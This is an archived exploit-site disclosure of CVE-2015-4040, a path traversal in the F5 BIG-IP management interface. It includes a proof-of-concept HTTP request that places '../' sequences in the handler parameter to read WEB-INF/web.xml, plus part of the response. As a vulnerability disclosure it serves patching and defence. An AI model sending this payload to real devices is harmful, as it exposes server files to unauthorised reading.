Twenty Year Anniversary

F5 BigIP 10.2.4 Build 595.0 HF3 Path Traversal

F5 BigIP 10.2.4 Build 595.0 HF3 Path Traversal
Posted Oct 12, 2015
Authored by Karn Ganeshen

F5 BigIP version 10.2.4 Build 595.0 Hotfix HF3 suffers from a path traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2015-4040
MD5 | f850a46f209835d27857572840d06cd1

F5 BigIP 10.2.4 Build 595.0 HF3 Path Traversal

Change Mirror Download
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040]
# Multiple Additional F5 products & versions are Affected and documented here: https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html

Vulnerability Details
The handler parameter is vulnerable to file path manipulation attacks. 

When we submit a payload /tmui/locallb/virtual_server/../../../../WEB-INF/web.xml in the handler parameter, the file WEB-INF/web.xml is returned.

PoC:

POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""

_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
...[SNIP]...
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml


Web.xml is returned in the Response:

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
<!--
Automatically created by Tomcat JspC.
-->
<web-app>
...[config file output redacted here]...

.....

--
Best Regards,
Karn Ganeshen

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    2 Files
  • 16
    Dec 16th
    3 Files
  • 17
    Dec 17th
    15 Files
  • 18
    Dec 18th
    15 Files
  • 19
    Dec 19th
    4 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close